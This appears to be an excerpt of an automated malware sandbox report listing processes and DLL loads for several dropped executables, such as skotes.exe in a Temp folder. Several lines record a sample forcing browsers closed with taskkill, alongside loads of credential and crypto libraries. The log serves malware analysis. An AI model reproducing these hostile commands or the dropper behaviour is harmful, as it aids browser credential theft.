Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe "C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
